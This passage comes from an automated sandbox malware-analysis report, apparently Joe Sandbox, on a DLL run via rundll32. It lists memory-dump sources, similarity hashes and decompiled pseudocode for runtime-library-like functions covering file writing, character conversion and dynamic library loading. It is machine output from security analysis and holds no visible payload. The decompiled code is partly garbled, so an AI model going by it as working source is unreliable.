                                0x7ffc130f5ac6
                                0x7ffc130f5ada
                                0x7ffc130f5ae4
                                0x7ffc130f5af3
                                0x7ffc130f5af9
                                0x7ffc130f5afc
                                0x7ffc130f5b09
                                0x7ffc130f5b13
                                0x7ffc130f5b1e
                                0x7ffc130f5b25
                                0x7ffc130f5b34
                                0x7ffc130f5b36
                                0x7ffc130f5b48
                                0x7ffc130f5b4b
                                0x7ffc130f5b5b
                                0x7ffc130f5b69
                                0x7ffc130f5b8b
                                0x7ffc130f5b95
                                0x7ffc130f5ba5
                                0x7ffc130f5bae
                                0x7ffc130f5bb3
                                0x7ffc130f5bba
                                0x7ffc130f5bc6
                                0x7ffc130f5bc8
                                0x7ffc130f5bd0
                                0x7ffc130f5bd6
                                0x7ffc130f5bd9
                                0x7ffc130f5be0
                                0x7ffc130f5be2
                                0x7ffc130f5beb
                                0x7ffc130f5bf4
                                0x7ffc130f5bfb
                                0x7ffc130f5c00
                                0x7ffc130f5c05
                                0x7ffc130f5c0b
                                0x7ffc130f5c16
                                0x7ffc130f5c18
                                0x7ffc130f5c2b
                                0x7ffc130f5c2d
                                0x7ffc130f5c2f
                                0x7ffc130f5c33
                                0x7ffc130f5c40
                                0x7ffc130f5c53
                                0x7ffc130f5c58
                                0x7ffc130f5c66
                                0x7ffc130f5c68
                                0x7ffc130f5c6d
                                0x7ffc130f5c73
                                0x7ffc130f5c78
                                0x7ffc130f5c7e
                                0x7ffc130f5c86
                                0x7ffc130f5c8e
                                0x7ffc130f5c95
                                0x7ffc130f5c97
                                0x7ffc130f5c9c
                                0x7ffc130f5c9e
                                0x7ffc130f5ca3
                                0x7ffc130f5cc8

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction ID: d87aa89be38254d429dec8f1926e9f76cc9980d3ac39fc49bde44a9cb0598bb5
                                • Opcode Fuzzy Hash: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction Fuzzy Hash: 23C1F422A1CEAEC7EA648F10994027D6BD9BB80BE8F550174DA4E233D5CF3DD865C360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130ED47C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction ID: af41ad1a353df793f28d0ed632af6f6e6ff1c393578a34c4022ff524bf2c32b2
                                • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction Fuzzy Hash: 0AF0C862B19F5696FF449B15F48027963A0EF8C7A8F541435D90F22664DF3CD494D320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4AF8 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E00007FFC7FFC130F4AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
				char _v64;
				signed long long _v72;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rbp;
				void* _t75;
				long _t94;
				unsigned int _t95;
				intOrPtr _t103;
				signed int _t124;
				intOrPtr _t158;
				unsigned long long _t164;
				signed int* _t166;
				intOrPtr _t169;
				unsigned int _t182;
				signed short* _t183;
				void* _t185;
				signed long long _t194;
				void* _t195;
				signed long long _t197;
				signed long long _t198;
				signed long long _t200;
				void* _t201;
				signed short* _t202;

				_t192 = __r9;
				_t179 = __rdx;
				_t167 = __rbx;
				_a32 = __rbx;
				r15d = r8d;
				_t194 = __ecx;
				_t183 = __rdx;
				if (r8d != 0) goto 0x130f4b26;
				goto 0x130f4dc1;
				if (__rdx != 0) goto 0x130f4b4a;
				E00007FFC7FFC130EE680(__rax);
				 *__rax = 0;
				_t75 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t75);
				goto 0x130f4dc1;
				r14d = r14d & 0x0000003f;
				_t197 = _t194 >> 6;
				_t200 = _t194 << 6;
				_v72 = _t197;
				_t169 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
				if (__rbx - 1 - 1 > 0) goto 0x130f4b80;
				if (( !r15d & 0x00000001) == 0) goto 0x130f4b2b;
				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x130f4b96;
				_t14 = _t179 + 2; // 0x2
				r8d = _t14;
				E00007FFC7FFC130F5D68(0x13124970, _t169, __rdx);
				_v88 = _t182;
				if (E00007FFC7FFC130F3EE4(r12d, 0, 0x13124970) == 0) goto 0x130f4cab;
				_t158 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
				if (( *(0x13124970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4cab;
				E00007FFC7FFC130EF0D4(_t158, __rbx, _t169, _t179, __r9);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x130f4bec;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x130f4cab;
				if (GetConsoleMode(??, ??) == 0) goto 0x130f4cab;
				if (_t103 == 0) goto 0x130f4c8d;
				if (_t103 - 1 - 1 > 0) goto 0x130f4d48;
				_v104 = _v104 & 0;
				_t195 = _t183 + _t201;
				_t202 = _t183;
				_v100 = 0;
				if (_t183 - _t195 >= 0) goto 0x130f4d3e;
				r13d =  *_t202 & 0x0000ffff;
				if (E00007FFC7FFC130F633C(r13w & 0xffffffff) != r13w) goto 0x130f4c7b;
				_v100 = 2;
				if (r13w != 0xa) goto 0x130f4c70;
				r13d = 0xd;
				if (E00007FFC7FFC130F633C(r13d) != r13w) goto 0x130f4c7b;
				_v100 = 2;
				if ( &(_t202[1]) - _t195 >= 0) goto 0x130f4c84;
				goto 0x130f4c35;
				_v104 = GetLastError();
				_t198 = _v72;
				goto 0x130f4d3e;
				r9d = r15d;
				E00007FFC7FFC130F446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
				asm("movsd xmm0, [eax]");
				_t124 =  *0x7FFC13124978;
				goto 0x130f4d43;
				if (( *( *((intOrPtr*)(0x13124970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4d0b;
				if (3 == 0) goto 0x130f4cf7;
				if (3 == 0) goto 0x130f4ce3;
				if (2 != 1) goto 0x130f4d48;
				r9d = r15d;
				E00007FFC7FFC130F477C(3, r12d, 0x13124970, _t167,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				r9d = r15d;
				E00007FFC7FFC130F4898(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				r9d = r15d;
				E00007FFC7FFC130F4674(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				_v104 = _v104 & _t124;
				_v120 = _v120 & 0x13124970;
				r8d = r15d;
				_v100 = 0x13124970;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x130f4d3b;
				_t94 = GetLastError();
				_v104 = _t94;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t164 = _v88 >> 0x20;
				if (_t94 != 0) goto 0x130f4dbc;
				_t95 = _v88;
				if (_t95 == 0) goto 0x130f4d88;
				if (_t95 != 5) goto 0x130f4d7b;
				E00007FFC7FFC130EE6A0(_t164);
				 *_t164 = 9;
				E00007FFC7FFC130EE680(_t164);
				 *_t164 = 5;
				goto 0x130f4b42;
				E00007FFC7FFC130EE630(_v88, _t164, _t167);
				goto 0x130f4b42;
				_t166 =  *((intOrPtr*)(0x13124970 + _t198 * 8));
				if (( *(0x13124970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x130f4da4;
				if ( *_t183 == 0x1a) goto 0x130f4b1f;
				E00007FFC7FFC130EE6A0(_t166);
				 *0x13124970 = 0x1c;
				E00007FFC7FFC130EE680(_t166);
				 *_t166 =  *_t166 & 0x00000000;
				goto 0x130f4b42;
				return _v84 - _v96;
			}































                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4b11
                                0x7ffc130f4b14
                                0x7ffc130f4b17
                                0x7ffc130f4b1d
                                0x7ffc130f4b21
                                0x7ffc130f4b29
                                0x7ffc130f4b2b
                                0x7ffc130f4b30
                                0x7ffc130f4b32
                                0x7ffc130f4b37
                                0x7ffc130f4b3d
                                0x7ffc130f4b45
                                0x7ffc130f4b54
                                0x7ffc130f4b5b
                                0x7ffc130f4b5f
                                0x7ffc130f4b63
                                0x7ffc130f4b67
                                0x7ffc130f4b6b
                                0x7ffc130f4b75
                                0x7ffc130f4b7e
                                0x7ffc130f4b86
                                0x7ffc130f4b8d
                                0x7ffc130f4b8d
                                0x7ffc130f4b91
                                0x7ffc130f4b99
                                0x7ffc130f4ba4
                                0x7ffc130f4bb1
                                0x7ffc130f4bbb
                                0x7ffc130f4bc1
                                0x7ffc130f4bd4
                                0x7ffc130f4be6
                                0x7ffc130f4c08
                                0x7ffc130f4c10
                                0x7ffc130f4c17
                                0x7ffc130f4c1d
                                0x7ffc130f4c20
                                0x7ffc130f4c26
                                0x7ffc130f4c29
                                0x7ffc130f4c2f
                                0x7ffc130f4c35
                                0x7ffc130f4c46
                                0x7ffc130f4c4b
                                0x7ffc130f4c53
                                0x7ffc130f4c55
                                0x7ffc130f4c67
                                0x7ffc130f4c6b
                                0x7ffc130f4c77
                                0x7ffc130f4c79
                                0x7ffc130f4c81
                                0x7ffc130f4c84
                                0x7ffc130f4c88
                                0x7ffc130f4c8d
                                0x7ffc130f4c9a
                                0x7ffc130f4c9f
                                0x7ffc130f4ca3
                                0x7ffc130f4ca6
                                0x7ffc130f4cbc
                                0x7ffc130f4cc3
                                0x7ffc130f4cc8
                                0x7ffc130f4ccd
                                0x7ffc130f4ccf
                                0x7ffc130f4cdc
                                0x7ffc130f4ce1
                                0x7ffc130f4ce3
                                0x7ffc130f4cf0
                                0x7ffc130f4cf5
                                0x7ffc130f4cf7
                                0x7ffc130f4d04
                                0x7ffc130f4d09
                                0x7ffc130f4d14
                                0x7ffc130f4d19
                                0x7ffc130f4d1e
                                0x7ffc130f4d24
                                0x7ffc130f4d30
                                0x7ffc130f4d32
                                0x7ffc130f4d38
                                0x7ffc130f4d3e
                                0x7ffc130f4d43
                                0x7ffc130f4d4c
                                0x7ffc130f4d52
                                0x7ffc130f4d54
                                0x7ffc130f4d59
                                0x7ffc130f4d5e
                                0x7ffc130f4d60
                                0x7ffc130f4d65
                                0x7ffc130f4d6b
                                0x7ffc130f4d70
                                0x7ffc130f4d76
                                0x7ffc130f4d7e
                                0x7ffc130f4d83
                                0x7ffc130f4d8f
                                0x7ffc130f4d99
                                0x7ffc130f4d9e
                                0x7ffc130f4da4
                                0x7ffc130f4da9
                                0x7ffc130f4daf
                                0x7ffc130f4db4
                                0x7ffc130f4db7
                                0x7ffc130f4dd8

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction ID: 8198741ddaf4f9c2ed38ab7a1c700d2cf715dc8ed07617c4b25deb922127e75a
                                • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction Fuzzy Hash: A481BF22B18E2A86FB509F6599406BD26E8BF44BACF424175CE0E337D5DF3CA461C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F446C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E00007FFC7FFC130F446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
				signed long long _v72;
				char _v80;
				intOrPtr _v87;
				char _v88;
				long long _v96;
				long long _v104;
				int _v108;
				intOrPtr _v112;
				short _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				intOrPtr _v144;
				signed int _v152;
				int _t80;
				long _t85;
				signed char _t86;
				signed long long _t116;
				intOrPtr _t120;
				long* _t125;
				signed long long _t127;
				intOrPtr _t136;
				signed long long _t140;
				void* _t143;
				signed long long _t146;
				void* _t148;
				void* _t156;
				void* _t157;
				signed long long _t161;

				_t127 = __rcx;
				_a8 = __rbx;
				_t116 =  *0x13123760; // 0xb74f7d657c87
				_v72 = _t116 ^ _t148 - 0x00000080;
				r12d = r9d;
				_t161 = __edx >> 6;
				_t146 = __edx << 6;
				_v96 = __r8;
				_t125 = __rcx;
				_t157 = _t156 + __r8;
				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x28));
				_v104 = 0x13124970;
				_v108 = GetConsoleCP();
				 *__rcx = __rdx;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t157 >= 0) goto 0x130f464a;
				r13b =  *((intOrPtr*)(__r8));
				_v120 = 0;
				_t136 =  *((intOrPtr*)(0x13124970 + _t161 * 8));
				_t86 =  *(_t136 + _t146 + 0x3d);
				if ((_t86 & 0x00000004) == 0) goto 0x130f451f;
				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
				_v87 = r13b;
				goto 0x130f4564;
				E00007FFC7FFC130F1740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x130f455b;
				if (__r8 - _t157 >= 0) goto 0x130f462a;
				r8d = 2;
				if (E00007FFC7FFC130F1654( &_v120, __r8) == 0xffffffff) goto 0x130f464a;
				_t143 = __r8 + 1;
				goto 0x130f4576;
				r8d = 1;
				if (E00007FFC7FFC130F1654( &_v120, _t143) == 0xffffffff) goto 0x130f464a;
				_v128 = _v128 & 0x00000000;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 =  &_v80;
				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t80;
				if (_t80 == 0) goto 0x130f464a;
				_v152 = _v152 & 0x00000000;
				_t140 =  &_v80;
				r8d = _t80;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
				_t125[1] = _t125[2] - _v96 + __edi;
				if (_v112 - r14d < 0) goto 0x130f464a;
				if (r13b != 0xa) goto 0x130f4622;
				_t50 = _t140 + 0xd; // 0xd
				_v152 = _t140;
				_t52 = _t140 + 1; // 0x1
				r8d = _t52;
				_v116 = _t50;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
				if (_v112 - 1 < 0) goto 0x130f464a;
				_t125[2] = _t125[2] + 1;
				_t125[1] = _t125[1] + 1;
				goto 0x130f44e0;
				 *((char*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
				 *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
				_t125[1] = _t125[1] + 1;
				goto 0x130f464a;
				_t85 = GetLastError();
				 *_t125 = _t85;
				E00007FFC7FFC130F6D80();
				return _t85;
			}
































                                0x7ffc130f446c
                                0x7ffc130f446c
                                0x7ffc130f4486
                                0x7ffc130f4490
                                0x7ffc130f44a1
                                0x7ffc130f44a4
                                0x7ffc130f44ab
                                0x7ffc130f44b2
                                0x7ffc130f44b6
                                0x7ffc130f44b9
                                0x7ffc130f44c0
                                0x7ffc130f44c5
                                0x7ffc130f44d1
                                0x7ffc130f44d4
                                0x7ffc130f44da
                                0x7ffc130f44e0
                                0x7ffc130f44e6
                                0x7ffc130f44f0
                                0x7ffc130f44f4
                                0x7ffc130f44f8
                                0x7ffc130f44ff
                                0x7ffc130f4508
                                0x7ffc130f450c
                                0x7ffc130f4516
                                0x7ffc130f4519
                                0x7ffc130f451d
                                0x7ffc130f451f
                                0x7ffc130f4530
                                0x7ffc130f4535
                                0x7ffc130f453b
                                0x7ffc130f4550
                                0x7ffc130f4556
                                0x7ffc130f4559
                                0x7ffc130f455b
                                0x7ffc130f4570
                                0x7ffc130f4576
                                0x7ffc130f4580
                                0x7ffc130f458d
                                0x7ffc130f4593
                                0x7ffc130f459d
                                0x7ffc130f45a5
                                0x7ffc130f45ab
                                0x7ffc130f45b0
                                0x7ffc130f45be
                                0x7ffc130f45c4
                                0x7ffc130f45c8
                                0x7ffc130f45d5
                                0x7ffc130f45df
                                0x7ffc130f45e6
                                0x7ffc130f45ec
                                0x7ffc130f45f2
                                0x7ffc130f45f5
                                0x7ffc130f45fa
                                0x7ffc130f45fa
                                0x7ffc130f4602
                                0x7ffc130f4614
                                0x7ffc130f461a
                                0x7ffc130f461c
                                0x7ffc130f461f
                                0x7ffc130f4625
                                0x7ffc130f4630
                                0x7ffc130f4638
                                0x7ffc130f463d
                                0x7ffc130f4640
                                0x7ffc130f4642
                                0x7ffc130f4648
                                0x7ffc130f4654
                                0x7ffc130f4673

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                • String ID:
                                • API String ID: 3659116390-0
                                • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction ID: 9de9824038147a5cd8e5a518f35adca10164798dc89546b3ec1ab7c393af6ecd
                                • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction Fuzzy Hash: 7B51D232A18A658AFB10CF25E9443AD37B4FB48BACF148135CE0A67798DF38D165C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF320 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 36%
                                			E00007FFC7FFC130EF320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				signed long long _t72;
				signed long long _t76;
				intOrPtr _t78;
				signed long long _t80;
				signed long long _t89;
				struct HINSTANCE__* _t94;
				signed long long _t95;
				long long _t101;
				void* _t105;
				signed long long _t109;
				signed long long _t111;
				signed long long _t114;
				struct HINSTANCE__* _t115;
				long _t118;
				void* _t121;
				WCHAR* _t123;

				 *((long long*)(_t105 + 8)) = __rbx;
				 *((long long*)(_t105 + 0x10)) = _t101;
				 *((long long*)(_t105 + 0x18)) = __rsi;
				r14d = __ecx;
				_t111 =  *0x13123760; // 0xb74f7d657c87
				_t95 = _t94 | 0xffffffff;
				_t89 = _t111 ^  *(0x7ffc130e0000 + 0x44810 + _t121 * 8);
				asm("dec eax");
				if (_t89 == _t95) goto 0x130ef4a1;
				if (_t89 == 0) goto 0x130ef389;
				_t72 = _t89;
				goto 0x130ef4a3;
				if (__r8 == __r9) goto 0x130ef435;
				_t78 =  *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8));
				if (_t78 == 0) goto 0x130ef3a9;
				if (_t78 == _t95) goto 0x130ef421;
				goto 0x130ef41c;
				r8d = 0x800;
				LoadLibraryExW(_t123, _t121, _t118);
				if (_t72 != 0) goto 0x130ef3ea;
				if (GetLastError() != 0x57) goto 0x130ef3e8;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t80 = _t72;
				goto 0x130ef3ea;
				if (_t80 != 0) goto 0x130ef403;
				 *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8)) = _t95;
				goto 0x130ef421;
				_t19 = 0x7ffc130e0000 + 0x44770 + __rsi * 8;
				_t76 =  *_t19;
				 *_t19 = _t80;
				if (_t76 == 0) goto 0x130ef41c;
				FreeLibrary(_t115);
				if (_t80 != 0) goto 0x130ef476;
				if (__r8 + 4 != __r9) goto 0x130ef392;
				if (_t80 == 0) goto 0x130ef486;
				GetProcAddress(_t94);
				if (_t76 == 0) goto 0x130ef47f;
				_t109 =  *0x13123760; // 0xb74f7d657c87
				asm("dec eax");
				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
				goto 0x130ef4a3;
				goto 0x130ef437;
				_t114 =  *0x13123760; // 0xb74f7d657c87
				asm("dec eax");
				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
				return 0;
			}



















                                0x7ffc130ef320
                                0x7ffc130ef325
                                0x7ffc130ef32a
                                0x7ffc130ef33c
                                0x7ffc130ef357
                                0x7ffc130ef35e
                                0x7ffc130ef368
                                0x7ffc130ef370
                                0x7ffc130ef376
                                0x7ffc130ef37f
                                0x7ffc130ef381
                                0x7ffc130ef384
                                0x7ffc130ef38c
                                0x7ffc130ef395
                                0x7ffc130ef3a0
                                0x7ffc130ef3a5
                                0x7ffc130ef3a7
                                0x7ffc130ef3b6
                                0x7ffc130ef3bc
                                0x7ffc130ef3c8
                                0x7ffc130ef3d3
                                0x7ffc130ef3d5
                                0x7ffc130ef3dd
                                0x7ffc130ef3e3
                                0x7ffc130ef3e6
                                0x7ffc130ef3f4
                                0x7ffc130ef3f9
                                0x7ffc130ef401
                                0x7ffc130ef406
                                0x7ffc130ef406
                                0x7ffc130ef406
                                0x7ffc130ef411
                                0x7ffc130ef416
                                0x7ffc130ef41f
                                0x7ffc130ef428
                                0x7ffc130ef43a
                                0x7ffc130ef442
                                0x7ffc130ef44b
                                0x7ffc130ef44d
                                0x7ffc130ef466
                                0x7ffc130ef46c
                                0x7ffc130ef474
                                0x7ffc130ef47d
                                0x7ffc130ef47f
                                0x7ffc130ef493
                                0x7ffc130ef499
                                0x7ffc130ef4bf

                                APIs
                                • GetProcAddress.KERNEL32(?,0000B74F7D657C87,00000006,00007FFC130EF647,?,?,00000000,00007FFC130EF1C7,?,?,0000B74F7D657C87,00007FFC130EE6A9), ref: 00007FFC130EF442
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID:
                                • API String ID: 190572456-0
                                • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction ID: b3c1aa9b45117998430089d8621a0ccc55ad2349ced2e3cb28d30a168b23aa20
                                • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction Fuzzy Hash: CE4128A2B0EE6981FE118B52A80027523D1BF04BF8F1A4939DD1D5B7C4EF3CE015C214
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4EEC Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                Download Yara Rule
                                C-Code - Quality: 32%
                                			E00007FFC7FFC130F4EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v32;
				long long _v40;
				void* _t11;
				long long _t49;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if (__rcx != 0) goto 0x130f4f28;
				_t11 = E00007FFC7FFC130EE6A0(__rax);
				 *((intOrPtr*)(__rax)) = 0x16;
				E00007FFC7FFC130EE580(_t11);
				goto 0x130f4fc9;
				if (__rdx == 0) goto 0x130f4f11;
				E00007FFC7FFC130EF4C0();
				_v32 = 0;
				r15d = 0;
				 *__rdx = _t49;
				r15b = 0 == 0;
				_v40 = _t49;
				r9d = r9d | 0xffffffff;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4f6f;
				E00007FFC7FFC130EE630(GetLastError(), __rax, __rbx);
				goto 0x130f4f21;
				E00007FFC7FFC130EE154(__rax, _t14 + _t14);
				if (__rax == 0) goto 0x130f4fbf;
				_v32 = r14d;
				r9d = r9d | 0xffffffff;
				_v40 = __rax;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4fb1;
				E00007FFC7FFC130EE630(GetLastError(), __rax, __rax);
				goto 0x130f4fbf;
				 *__rdx = __rax;
				E00007FFC7FFC130EE114(__rax, _t49);
				return 1;
			}







                                0x7ffc130f4eec
                                0x7ffc130f4ef1
                                0x7ffc130f4ef6
                                0x7ffc130f4f0f
                                0x7ffc130f4f11
                                0x7ffc130f4f16
                                0x7ffc130f4f1c
                                0x7ffc130f4f23
                                0x7ffc130f4f2b
                                0x7ffc130f4f2d
                                0x7ffc130f4f34
                                0x7ffc130f4f38
                                0x7ffc130f4f3b
                                0x7ffc130f4f3e
                                0x7ffc130f4f42
                                0x7ffc130f4f4a
                                0x7ffc130f4f5e
                                0x7ffc130f4f68
                                0x7ffc130f4f6d
                                0x7ffc130f4f75
                                0x7ffc130f4f80
                                0x7ffc130f4f82
                                0x7ffc130f4f87
                                0x7ffc130f4f8e
                                0x7ffc130f4fa0
                                0x7ffc130f4faa
                                0x7ffc130f4faf
